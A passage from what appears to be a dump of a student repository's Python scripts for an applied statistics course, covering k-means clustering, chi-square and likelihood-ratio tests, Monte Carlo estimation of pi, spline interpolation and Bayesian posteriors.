np.array([])\ndiff_A10_AdjO = np.array([])\nA10_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(A10_teams_2014, 0):\n for j, team_2009 in enumerate(A10_teams_2009, 0):\n if team_2014 == team_2009:\n diff_A10_teams = np.append(diff_A10_teams, team_2014)\n A10_Adjo_2009_value = np.append(A10_Adjo_2009_value, A10_AdjO_2009[j])\n diff_A10_AdjO = np.append(diff_A10_AdjO, A10_AdjO_2014[i] - A10_AdjO_2009[j])\n\ndiff_BE_teams = np.array([])\ndiff_BE_AdjO = np.array([])\nBE_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(BE_teams_2014, 0):\n for j, team_2009 in enumerate(BE_teams_2009, 0):\n if team_2014 == team_2009:\n diff_BE_teams = np.append(diff_BE_teams, team_2014)\n BE_Adjo_2009_value = np.append(BE_Adjo_2009_value, BE_AdjO_2009[j])\n diff_BE_AdjO = np.append(diff_BE_AdjO, BE_AdjO_2014[i] - BE_AdjO_2009[j])\n\ndiff_rest_teams = np.array([])\ndiff_rest_AdjO = np.array([])\nrest_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(rest_teams_2014, 0):\n for j, team_2009 in enumerate(rest_teams_2009, 0):\n if team_2014 == team_2009:\n diff_rest_teams = np.append(diff_rest_teams, team_2014)\n rest_Adjo_2009_value = np.append(rest_Adjo_2009_value, rest_AdjO_2009[j])\n diff_rest_AdjO = np.append(diff_rest_AdjO, rest_AdjO_2014[i] - rest_AdjO_2009[j])\n\nplt.plot(ACC_Adjo_2009_value, diff_ACC_AdjO, alpha=0.9, color='blue', marker='o', 
linestyle='none', label='ACC')\nplt.plot(SEC_Adjo_2009_value, diff_SEC_AdjO, color='maroon', marker='o', linestyle='none', label='SEC')\nplt.plot(B10_Adjo_2009_value, diff_B10_AdjO, alpha=1, color='yellow', markeredgecolor='black', marker='o', linestyle='none', label='B10')\nplt.plot(BSky_Adjo_2009_value, diff_BSky_AdjO, color='green', marker='o', linestyle='none', label='BSky')\nplt.plot(A10_Adjo_2009_value, diff_A10_AdjO, alpha=1, color='grey', markeredgecolor='black', marker='o', linestyle='none', label='A10')\nplt.plot(BE_Adjo_2009_value, diff_BE_AdjO, alpha=0.5, color='m', markeredgecolor='black', marker='o', linestyle='none', label='BE')\n\nplt.title(\"AdjO difference for teams in 6 conferences in both 2009 and 2014 datasets\")\n\n\n\nplt.ylabel('AdjO difference (2014-2009)')\nplt.xlabel('2009 AdjO value')\n\nplt.legend()\nplt.show()\n\nACC_mean = np.mean(diff_ACC_AdjO)\nACC_median = np.median(diff_ACC_AdjO)\nprint(\"Mean for ACC is: %8.2f\" % (ACC_mean))\nprint(\"Median for ACC is: %8.2f\" % (ACC_median))\n\nSEC_mean = np.mean(diff_SEC_AdjO)\nSEC_median = np.median(diff_SEC_AdjO)\nprint(\"Mean for SEC is: %8.2f\" % (SEC_mean))\nprint(\"Median for SEC is: %8.2f\" % (SEC_median))\n\nB10_mean = np.mean(diff_B10_AdjO)\nB10_median = np.median(diff_B10_AdjO)\nprint(\"Mean for B10 is: %8.2f\" % (B10_mean))\nprint(\"Median for B10 is: %8.2f\" % (B10_median))\n\nBSky_mean = np.mean(diff_BSky_AdjO)\nBSky_median = np.median(diff_BSky_AdjO)\nprint(\"Mean for BSky is: %8.2f\" % (BSky_mean))\nprint(\"Median for BSky is: %8.2f\" % (BSky_median))\n\nA10_mean = np.mean(diff_A10_AdjO)\nA10_median = np.median(diff_A10_AdjO)\nprint(\"Mean for A10 is: %8.2f\" % (A10_mean))\nprint(\"Median for A10 is: %8.2f\" % (A10_median))\n\nBE_mean = np.mean(diff_BE_AdjO)\nBE_median = np.median(diff_BE_AdjO)\nprint(\"Mean for BE is: %8.2f\" % (BE_mean))\nprint(\"Median for BE is: %8.2f\" % (BE_median))\n\nrest_mean = np.mean(diff_rest_AdjO)\nrest_median = np.median(diff_rest_AdjO)\nprint(\"Mean for rest is: %8.2f\" % (rest_mean))\nprint(\"Median for rest is: %8.2f\" % (rest_median))\n" }, { "alpha_fraction": 0.4942112863063812, "alphanum_fraction": 0.5466715097427368, "avg_line_length": 27.17346954345703, "blob_id": "d47b124fc7121dec00f8e05a1a56cfe21b969625", "content_id": "7b2c2d2c60d7057dd4f5e92fac8ba9326593b03f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2764, "license_type": "no_license", "max_line_length": 78, "num_lines": 98, "path": "/Problem_set_2/problem_5.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy import special\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2\n\n\ndef expected_pdf(X, t):\n b, sigma = X\n\n temp1 = np.exp(-(2 * b * t - sigma ** 2) / (2 * b ** 2))\n temp2 = special.erf((b * t - sigma ** 2) / (np.sqrt(2) * b * sigma)) + 1\n temp3 = (2 * b)\n pdf = (temp1 * temp2) / temp3\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\ndef test_pdf(X, t):\n b, sigma = X\n\n temp1 = np.exp(-(2 * b * t - sigma ** 2) / (2 * b ** 2))\n temp2 = special.erf((b * t - sigma ** 2) / (np.sqrt(2) * b * sigma)) + 1\n temp3 = (2 * b)\n pdf = (temp1 * temp2) / temp3\n\n return pdf\n\n\nfnames = 'ProblemSet2_Prob5_NucData.txt'\ndata = np.loadtxt(fnames)\ndata = data.reshape((100, 200))\n\nh_0 = []\nh_1 = []\n\nfor i in range(data.shape[0]):\n z = data[i, :]\n print(z.shape)\n\n result_1 = 
minimize(expected_pdf, [1, 1], args=(z), method='SLSQP',\n bounds=((1, 1), (1e-10, None)))\n result_2 = minimize(expected_pdf, [1, 1], args=(z), method='SLSQP',\n bounds=((1e-10, None), (1e-10, None)))\n\n h_0 = np.append(h_0, -result_1.fun)\n h_1 = np.append(h_1, -result_2.fun)\n\nratio = -2 * (h_0 - h_1)\n\n\nprint('Number of values in array larger than 2.706 is: %.2f'\n % len(ratio[ratio > 2.706]))\n\nbinwidth = 1\nn_bins = np.arange(min(ratio), max(ratio) + binwidth, binwidth)\nprint(n_bins)\nplt.figure()\nobserved_values, bins, _ = plt.hist(ratio, bins=n_bins,\n label='-2ln($\\lambda$)')\nplt.xlabel('-2ln($\\lambda$)')\nplt.ylabel('Count')\nplt.legend()\nplt.savefig('lnlikelihoods', dpi=200)\n\nexpected_values = [(special.erf(np.sqrt((i + 1) / 2)) -\n special.erf(np.sqrt(i / 2))) * 100\n for i in range(8)]\n\nprint(observed_values)\nprint(expected_values)\nprint(chisquare(observed_values, f_exp=expected_values))\nprint('Threshold value ', chi2.isf(0.05, 7))\n\n##############################################################################\nz = data.flatten()\n\nresult_1 = minimize(expected_pdf, [1, 1], args=(z), method='SLSQP',\n bounds=((1.05, 1.05), (1e-10, None)))\nresult_2 = minimize(expected_pdf, [1, 1], args=(z), method='SLSQP',\n bounds=((1e-10, None), (1e-10, None)))\n\nh_0 = []\nh_1 = []\nh_0 = np.append(h_0, -result_1.fun)\nh_1 = np.append(h_1, -result_2.fun)\nratio = -2 * (h_0 - h_1)\n\nx = np.arange(-2.5, 10, 0.1)\nplt.figure()\nprint(result_1.x, result_2.x)\nplt.plot(x, test_pdf(result_1.x, x), label='$H_0$')\nplt.plot(x, test_pdf(result_2.x, x), label='$H_1$')\nplt.hist(z, density=True, bins=100, label='Data')\nplt.legend()\nplt.xlabel('t')\nplt.savefig('data_h0h1', dpi=200)\nplt.show()\n\n\n\n" }, { "alpha_fraction": 0.5418312549591064, "alphanum_fraction": 0.5754637718200684, "avg_line_length": 28.515901565551758, "blob_id": "c7e1748381ed6855c962450773e29c84a766203f", "content_id": "4830468cd93f5e1c4c081cc01062f78b71c0299b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8355, "license_type": "no_license", "max_line_length": 107, "num_lines": 283, "path": "/Project/k_means_clustering_illustration.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport struct\nimport time\n\n\n# I stole this function from the interwebz\ndef loadlocal_mnist(images_path, labels_path):\n \"\"\" Read MNIST from ubyte files.\n Parameters\n ----------\n images_path : str\n path to the test or train MNIST ubyte file\n labels_path : str\n path to the test or train MNIST class labels file\n Returns\n --------\n images : [n_samples, n_pixels] numpy.array\n Pixel values of the images.\n labels : [n_samples] numpy array\n Target class labels\n Examples\n -----------\n For usage examples, please see\n http://rasbt.github.io/mlxtend/user_guide/data/loadlocal_mnist/\n \"\"\"\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8)\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack(\">IIII\",\n imgpath.read(16))\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels\n\n\ndef display_digit(data, index=None):\n '''\n Plots the digit on given index of data. 
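It is assumed\n to hold flattened 28x28 images whose pixel values start at column 2.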
\n If index is not given it assumes\n a single line of data.\n '''\n if index is not None:\n plt.imshow(data[index, 2::].reshape((28, 28)))\n else:\n plt.imshow(data[2::].reshape((28, 28)))\n\n\ndef init_centroids(data, n):\n \"\"\"\n Returns random initial centroids from data.\n \"\"\"\n index = np.random.randint(len(data), size=(n))\n init_cent = data[index, :]\n return init_cent\n\n\ndef dist_centroids(data, cent):\n '''\n Returns the distance between each point (each row in data) and centroids\n '''\n dist = []\n for i in range(cent.shape[0]):\n temp = np.linalg.norm(data[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n dist = dist.reshape((cent.shape[0], data.shape[0])).T\n return dist\n\n\ndef label_centroids(data, dist):\n '''\n Adds Label to data according to its closest centroid\n '''\n new_data = np.copy(data)\n temp = np.argmin(dist, axis=1) + 1\n new_data[:, 0] = temp\n return new_data\n\n\ndef new_centroids(data, cent):\n '''\n Calculates the new centroids from data with same label\n '''\n new_cent = np.copy(cent)\n for i in range(new_cent.shape[0]):\n new = np.average(data[data[:, 0] == i + 1][:, 2::], axis=0)\n new_cent[i, 2::] = new\n\n return new_cent\n\n\ndef label_clusters(data, cent, n):\n '''\n Finds most common label in cluster and sets cluster label\n '''\n for i in range(n):\n temp = data[data[:, 0] == i + 1]\n if len(temp) == 0:\n continue\n\n temp1 = temp[:, 1].astype(int)\n label = np.bincount(temp1).argmax()\n cent[i, 0] = label\n\n return cent\n\n\ndef classify(to_be_classified, cent):\n\n dist = []\n for i in range(cent.shape[0]):\n temp = np.linalg.norm(to_be_classified[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n dist = dist.reshape((cent.shape[0], to_be_classified.shape[0])).T\n temp = np.argmin(dist, axis=1)\n\n to_be_classified[:, 0] = cent[temp, 0]\n\n return to_be_classified\n\n\ndef get_accuracy(x, y):\n\n correct_classified = 0\n for i in range(len(x)):\n if x[i] == y[i]:\n correct_classified += 1\n accuracy = correct_classified / len(x)\n\n return accuracy\n\n\ndef K_means(data, n):\n '''\n Does k-means analysis\n '''\n previous_difference = 0\n centroids = init_centroids(data, n)\n c = 221\n while True:\n print(1)\n print(centroids.shape)\n if c < 225:\n plt.subplot(c)\n plt.scatter(data[data[:, 0] == 0][:, 2], data[data[:, 0] == 0][:, 3], c='purple', s=10)\n plt.scatter(data[data[:, 0] == 1][:, 2], data[data[:, 0] == 1][:, 3], c='red', s=10)\n plt.scatter(data[data[:, 0] == 2][:, 2], data[data[:, 0] == 2][:, 3], c='green', s=10)\n plt.scatter(data[data[:, 0] == 3][:, 2], data[data[:, 0] == 3][:, 3], c='blue', s=10)\n\n plt.scatter(centroids[0, 2], centroids[0, 3], marker='d', s=100, c='red', edgecolors='black')\n plt.scatter(centroids[1, 2], centroids[1, 3], marker='d', s=100, c='green', edgecolors='black')\n plt.scatter(centroids[2, 2], centroids[2, 3], marker='d', s=100, c='blue', edgecolors='black')\n\n distance_from_centroids = dist_centroids(data, centroids)\n data = label_centroids(data, distance_from_centroids)\n centroids_new = new_centroids(data, centroids)\n\n difference = centroids[:, 2::] - centroids_new[:, 2::]\n norm_difference = np.linalg.norm(difference, axis=1)\n\n largest_norm_difference = max(norm_difference)\n\n difference_change = abs((largest_norm_difference - previous_difference) /\n np.mean([largest_norm_difference, previous_difference])) * 100\n previous_difference = largest_norm_difference\n centroids = np.copy(centroids_new)\n print(difference_change)\n # difference_change becomes NaN (0/0 above) once the centroids stop moving\n if np.isnan(difference_change):\n 
break\n c += 1\n\n centroids = label_clusters(data, centroids, n)\n\n return data, centroids\n\n\n# Read file\n# file_path = 'digit-recognizer/train.csv'\n\n# X_train, y_train_labels = loadlocal_mnist(\n# images_path='digit-recognizer/train-images-idx3-ubyte',\n# labels_path='digit-recognizer/train-labels-idx1-ubyte')\n\n# X_test, y_test_labels = loadlocal_mnist(\n# images_path='digit-recognizer/t10k-images-idx3-ubyte',\n# labels_path='digit-recognizer/t10k-labels-idx1-ubyte')\n\n# train = np.insert(X_train, 0, y_train_labels, axis=1)\n# train = np.insert(train, 0, np.zeros(train.shape[0]), axis=1)\n# train = train[:1000, :]\n\n# test = np.insert(X_test, 0, y_test_labels, axis=1)\n# test = np.insert(test, 0, np.zeros(test.shape[0]), axis=1)\n# test = test[:100, :]\n\n# print(train)\n# train, cent = K_means(train, 10)\n# print(train)\n# print(get_accuracy(train[:, 0], train[:, 1]))\n# data = pd.read_csv(file_path)\n# test = data.values\n# test = np.insert(test, 0, np.zeros(test.shape[0]), axis=1)\n# train = test[:40000, :]\n# to_test = test[40000:, :]\nnp.random.seed(6)\nA = np.random.normal(1, 0.1, (100, 2))\nA = np.insert(A, 0, np.zeros(A.shape[0]) + 1, axis=1)\n\n\n\nB = np.random.normal(2, 0.3, (100, 1))\nprint(B.shape)\ntemp = np.random.normal(1, 0.1, 100)\n\nB = np.insert(B, 0, temp, axis=1)\nprint(B.shape)\nB = np.insert(B, 0, np.zeros(B.shape[0]) + 2, axis=1)\nprint(B.shape)\n\n\n\nC = np.random.normal(1.5, 0.1, (100, 2))\nC = np.insert(C, 0, np.zeros(B.shape[0]) + 15, axis=1)\n\n\n\ntest = np.vstack((A, B))\ntest = np.vstack((test, C))\ntest = np.insert(test, 0, np.zeros(test.shape[0]), axis=1)\n\n\nmy_point = np.array([[-1, -1, 1, 2], [-1, -1, 1, 1], [-1, -1, 2, 2]])\n\n# print(test)\n\ntest, cent = K_means(test, 3)\nprint(test)\nprint(cent)\n# print(cent)\n# start = time.time()\n# classified = classify(my_point, cent)\n# end = time.time()\n# print(end - start)\n# print(get_accuracy(classified[:, 0], classified[:, 1]))\n\n# plt.scatter(test[:, 2], test[:, 3], c=test[:, 0])\n# plt.scatter(my_point[:, 2], my_point[:, 3], marker='d', s=100, label='my point')\n# plt.scatter(cent[0, 2], cent[0, 3], marker='x', label=str(cent[0,0]))\n# plt.scatter(cent[1, 2], cent[1, 3], marker='x', label=str(cent[1,0]))\n# plt.scatter(cent[2, 2], cent[2, 3], marker='x', label=str(cent[2,0]))\n# plt.scatter(cent[3, 2], cent[3, 3], marker='x', label=str(cent[3,0]))\n# plt.scatter(cent[4, 2], cent[4, 3], marker='x', label=str(cent[4,0]))\n# plt.legend()\nplt.show()\n\n\n\n# display_digit(data.iloc[0].values)\n# plt.figure()\n# display_digit(test, 0)\n# plt.show()\n\n\n# X = data.iloc[:, 1:].values\n# y = data.iloc[:, 0].values\n\n# X_train, X_test, y_train, y_test = train_test_split(X, y,\n# test_size=0.2,\n# random_state=42)\n\n# nr_unique_digits = len(np.unique(y_train))\n\n# kmeans = KMeans(n_clusters=50, random_state=0).fit(X_train)\n# predict_kmeans = kmeans.predict(X_test)\n\n# print(kmeans.labels_[0:20])\n# for i in range(10):\n# plt.figure()\n# plt.imshow(X_train[i, :].reshape((28, 28)))\n\n\n" }, { "alpha_fraction": 0.8040540814399719, "alphanum_fraction": 0.8040540814399719, "avg_line_length": 47.33333206176758, "blob_id": "1d59a4297ab1fa05112de343343b17c1c4afa3ed", "content_id": "2ab516cd19c79cafe955f1411633cf25c35f1269", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 148, "license_type": "no_license", "max_line_length": 102, "num_lines": 3, "path": "/readme.md", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", 
"src_encoding": "UTF-8", "text": "# Advanced Methods in Applied Statistics\n\nThis is all the code that i created while following the course Advanced Methods in Applied Statistics.\n\n\n\n" }, { "alpha_fraction": 0.6263269782066345, "alphanum_fraction": 0.6539278030395508, "avg_line_length": 21.380952835083008, "blob_id": "dc6fc6943033ff41988728820930f5fea8504451", "content_id": "2ce61d17dd7c724e6e6246947208e32b3dea2a9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 65, "num_lines": 21, "path": "/Week_2/Class_4/spline_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\n\nfname = 'DustLog_forClass.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx = loaded_file[:, 0]\ny = loaded_file[:, 1]\n\nf = interp1d(x, y)\nf1 = interp1d(x, y, kind='cubic')\n\nx_new = np.linspace(min(x), max(x), len(x)*10000, endpoint=True)\n\nplt.plot(x, y, 'k', marker='o', markersize='2', linestyle='none')\nplt.plot(x, f(x), 'b', linestyle='--')\nplt.plot(x_new, f1(x_new), 'r')\n\nplt.show()\n\n" }, { "alpha_fraction": 0.5844686627388, "alphanum_fraction": 0.6103542447090149, "avg_line_length": 18.83783721923828, "blob_id": "0eedc0006d2938187f23b83acc58101b8c0374f9", "content_id": "ea8b8fd588b28e9c5c7b2f88c8bb7e69e783f2f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 734, "license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/Week_1/Class_2/mc_pi.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nrandom.seed(142)\n\n# Create my empty arrays\nx = np.empty((1, 0))\ny = np.empty((1, 0))\nN = 1000\n\nx_missed = np.empty((1, 0))\ny_missed = np.empty((1, 0))\n\n# Fill my arrays with random numbers\nfor i in range(N):\n\n x_random = random.random()\n y_random = random.random()\n if (np.sqrt(x_random**2 + y_random**2)) < 1:\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n\n# Plot the numbers\nplt.plot(x, y, marker='o', linestyle='None')\nplt.plot(x_missed, y_missed, marker='.', linestyle='None')\n\nplt.show()\n\npi = len(x) / N * 4\n\nprint(pi)\n" }, { "alpha_fraction": 0.42036277055740356, "alphanum_fraction": 0.4443267583847046, "avg_line_length": 33.02252197265625, "blob_id": "2703854874b9f09523341cc7a26e438b0e0d5cf2", "content_id": "749fbdb9ec067c644766ff7c661e67bfb769b0c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7553, "license_type": "no_license", "max_line_length": 79, "num_lines": 222, "path": "/Exam_2019/Code/Problem_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import chisquare, chi2, kstest\n\n\ndef uniform_CDF(x, min, max):\n return (x - min) / (max - min)\n\n\nfname = 'Exam_2019_Problem2.txt'\ndata = np.loadtxt(fname, skiprows=2)\n\nazimuth_angle = data[:, 0]\nzenith_angle = np.cos(data[:, 1])\n\nnp.random.seed(421)\nuniform_azimuth = np.random.uniform(0, 2 * np.pi, len(azimuth_angle))\nuniform_zenith = np.random.uniform(-1, 1, 
len(zenith_angle))\n\n###############################################################################\nbinwidth = 1\nn_bins = np.arange(0, 2 * np.pi, binwidth)\n\nobserved_values, bins, _ = plt.hist(azimuth_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Azimuth Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_azimuth,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Azimuth',\n lw=2)\nplt.legend()\nplt.show()\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n\nprint('KSTEST', kstest(azimuth_angle, lambda x: uniform_CDF(x, 0, 2 * np.pi)))\n\n\n###############################################################################\n\nbinwidth = 0.5\nn_bins = np.arange(-1, 1 + binwidth, binwidth)\n\nobserved_values1, bins, _ = plt.hist(zenith_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Zenith Data',\n lw=2)\nexpected_values1, bins, _ = plt.hist(uniform_zenith,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Zenith',\n lw=2)\nplt.legend()\nplt.show()\n\nprint(observed_values1)\nprint(expected_values1)\nmy_chi = chisquare(observed_values1,\n f_exp=expected_values1)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values1) - 1))\n\nprint('DF', len(expected_values1) - 1)\n\nprint('KSTEST', kstest(zenith_angle, lambda x: uniform_CDF(x, -1, 1)))\n\n\n###############################################################################\nprint('Problem B starts here')\nprint('H_A')\nuniform_azimuth_20 = np.random.uniform(0.225*np.pi, 0.55 * np.pi, 20)\nuniform_zenith_20 = np.cos(np.random.uniform(0.3*np.pi, np.pi, 20))\n\nuniform_azimuth_80 = np.random.uniform(0, 2 * np.pi, 80)\nuniform_zenith_80 = np.random.uniform(-1, 1, 80)\n\n\nuniform_azimuth = np.append(uniform_azimuth_20, uniform_azimuth_80)\nuniform_zenith = np.append(uniform_zenith_20, uniform_zenith_80)\n\nbinwidth = 1\nn_bins = np.arange(0, 2 * np.pi, binwidth)\n\nobserved_values, bins, _ = plt.hist(azimuth_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Azimuth Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_azimuth,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Azimuth 80/20',\n lw=2)\nplt.legend()\nplt.show()\n\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n\n###############################################################################\n\nbinwidth = 0.5\nn_bins = np.arange(-1, 1 + binwidth, binwidth)\n\nobserved_values, bins, _ = plt.hist(zenith_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Zenith Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_zenith,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Zenith 80/20',\n lw=2)\nplt.legend()\nplt.show()\n\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n\n###############################################################################\nprint('H_B')\nuniform_azimuth_20 = np.random.uniform(0, np.pi, 15)\nuniform_zenith_20 = 
np.cos(np.random.uniform(0.5*np.pi, np.pi, 15))\n\nuniform_azimuth_80 = np.random.uniform(0, 2 * np.pi, 85)\nuniform_zenith_80 = np.random.uniform(-1, 1, 85)\n\n\nuniform_azimuth = np.append(uniform_azimuth_20, uniform_azimuth_80)\nuniform_zenith = np.append(uniform_zenith_20, uniform_zenith_80)\n\nbinwidth = 1\nn_bins = np.arange(0, 2 * np.pi, binwidth)\n\nobserved_values, bins, _ = plt.hist(azimuth_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Azimuth Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_azimuth,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Azimuth 85/15',\n lw=2)\nplt.legend()\nplt.show()\n\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n\n###############################################################################\n\nbinwidth = 0.5\nn_bins = np.arange(-1, 1 + binwidth, binwidth)\n\nobserved_values, bins, _ = plt.hist(zenith_angle,\n bins=n_bins,\n color='r',\n histtype='step',\n label='Zenith Data',\n lw=2)\nexpected_values, bins, _ = plt.hist(uniform_zenith,\n bins=n_bins,\n color='k',\n histtype='step',\n label='Monte Carlo Zenith 85/15',\n lw=2)\nplt.legend()\nplt.show()\n\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 1))\n\nprint('DF', len(expected_values) - 1)\n" }, { "alpha_fraction": 0.6402156949043274, "alphanum_fraction": 0.6872110962867737, "avg_line_length": 29.186046600341797, "blob_id": "f459aedc41807b109c7444d46aa3e94dcdd83360", "content_id": "ff186936009ea89372acecf289de950f91815a28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1298, "license_type": "no_license", "max_line_length": 114, "num_lines": 43, "path": "/Week_2/Class_4/bayes_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nk = 10\nbig_k = 100\nn = 60\n\n\ndef my_binomial_coefficient(n, k):\n result = math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n return result\n\ndef my_hypergeo(k, K, n, N):\n result = my_binomial_coefficient(K, k) * my_binomial_coefficient(N - K, n - k) / my_binomial_coefficient(N, n)\n return result\n\n\nposterior_flat = np.array([])\nposterior_1overN = np.array([])\n\nfor i in np.arange(150, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n posterior_flat = np.append(posterior_flat, temp)\n posterior_1overN = np.append(posterior_1overN, temp/i)\n\nk = 15\n\nposterior_flat_newk = np.array([])\nposterior_1overN_newk = np.array([])\n\nfor i in np.arange(150, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n posterior_flat_newk = np.append(posterior_flat_newk, temp)\n posterior_1overN_newk = np.append(posterior_1overN_newk, temp/i)\n\nplt.plot(np.arange(150, 2000), posterior_flat/np.sum(posterior_flat), 'r')\nplt.plot(np.arange(150, 2000), posterior_1overN/np.sum(posterior_1overN), 'r', linestyle='dashed')\n\nplt.plot(np.arange(150, 2000), posterior_flat_newk/np.sum(posterior_flat_newk), 'b')\nplt.plot(np.arange(150, 2000), posterior_1overN_newk/np.sum(posterior_1overN_newk), 'b', linestyle='dashed')\nplt.show()\n" }, { "alpha_fraction": 0.5913461446762085, "alphanum_fraction": 0.6346153616905212, 
"avg_line_length": 12.933333396911621, "blob_id": "d22485f03289c7424a55578212c293a89e71ff84", "content_id": "5266b81f9f533e9c72e5b8d168bf28e2ad1870e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 208, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/Week_5/Class_9/exercise_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n\nfor i in np.arange(0, 11, 0.05):\n my_lambda = i\n s = np.random.poisson(my_lambda, 100)\n\n\ny, x, _ = plt.hist(s)\nprint(x)\nprint(np.sum(y))\nplt.show()" }, { "alpha_fraction": 0.5830039381980896, "alphanum_fraction": 0.5997125506401062, "avg_line_length": 26.151220321655273, "blob_id": "c89a98787c7acf8a6aa08aee3b18536d8e0230ec", "content_id": "58db18b8300b96626747c036c4a9f1f507844844", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5566, "license_type": "no_license", "max_line_length": 81, "num_lines": 205, "path": "/Project/k_means_clustering.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport struct\nimport time\n\n\n# I stole this function from the interwebz\ndef loadlocal_mnist(images_path, labels_path):\n \"\"\" Read MNIST from ubyte files.\n Parameters\n ----------\n images_path : str\n path to the test or train MNIST ubyte file\n labels_path : str\n path to the test or train MNIST class labels file\n Returns\n --------\n images : [n_samples, n_pixels] numpy.array\n Pixel values of the images.\n labels : [n_samples] numpy array\n Target class labels\n Examples\n -----------\n For usage examples, please see\n http://rasbt.github.io/mlxtend/user_guide/data/loadlocal_mnist/\n \"\"\"\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8)\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack(\">IIII\",\n imgpath.read(16))\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels\n\n\ndef display_digit(data, index=None):\n '''\n Plots the digit on given index of data. 
